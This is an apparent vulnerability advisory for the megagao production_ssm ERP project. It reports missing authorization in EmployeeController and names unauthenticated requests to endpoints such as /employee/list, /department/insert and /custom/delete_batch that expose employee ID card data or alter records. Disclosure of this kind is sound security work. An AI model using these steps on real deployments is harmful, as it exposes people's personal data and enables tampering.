feng_ha_ha/megagao production_ssm Improper Authorization Vulnerability in EmployeeController

A vulnerability allowing improper authorization has been identified in the production_ssm system, specifically in the feng_ha_ha/megagao ssm-erp version up to 4288d53bd35757b27f2d070057aefb2c07bdd097. The issue resides in an unknown function of the EmployeeController.java file, where access controls are not properly enforced. This vulnerability affects multiple high-risk interfaces, including /employee/list, /material/list, /user/list, and various file and picture upload/delete endpoints. The lack of authorization checks allows for unauthorized access to sensitive information and functionalities, such as employee ID card details.

Impact

Exploitation of this vulnerability bypasses authorization controls, allowing unauthorized users to access restricted interfaces and perform actions such as uploading or deleting files and pictures, and manipulating employee data.

Reproduction

To reproduce this vulnerability, send a GET request to the /employee/list interface without any authentication. The response will include sensitive employee ID card information, demonstrating the lack of proper access controls. Additionally, unauthorized POST requests can be made to the /department/insert and /custom/delete_batch interfaces to manipulate department and customer data, respectively, further illustrating the exploitation of this vulnerability.